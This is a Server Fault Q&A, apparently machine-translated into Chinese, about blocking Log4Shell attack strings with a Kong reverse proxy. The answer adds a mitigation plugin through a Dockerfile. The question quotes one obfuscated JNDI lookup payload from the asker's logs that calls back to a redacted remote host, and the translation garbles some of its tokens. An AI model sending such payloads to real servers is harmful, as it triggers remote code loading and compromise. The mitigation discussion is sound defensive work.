Reverse-Proxy

使用kong反向代理過濾log4j漏洞

  • December 16, 2021

我正在使用kong 反向代理來代理我的 Web 伺服器的每個 HTTP 請求。我想通過查找和替換關鍵攻擊者的字元串(如“jndi”)來緩解目前的 log4j 問題(“ log4shell ”)。例如,我發現這是我的日誌:

${jndi: $ {lower:l} $ {降低:d}a $ {lower:p}://xxx.log4j.bin $ {上:a}xxx.xx:80/回調}

我認為這可以通過使用請求轉換器外掛來完成。有人已經這樣做了嗎?

PS只是替換jndidisabled太深遠了,破壞了很多東西。

來自 kong 的人最近發了一篇博文來回答我的問題。他們開發了一個kong 外掛來緩解漏洞。

我通過更改我的 Dockerfile 將此外掛添加到我的 kong 中:

FROM kong:2.6
...
USER root
...
# log4shell mitigation
# see https://konghq.com/blog/log4j-log4shell/
RUN git clone https://github.com/brentos/kong-plugin-log4shell && \
   cd kong-plugin-log4shell && \
   luarocks make
...
ENV KONG_PLUGINS ...,log4shell
...
USER kong

然後我只是將此 log4shell 添加為全域外掛。

引用自:https://serverfault.com/questions/1086133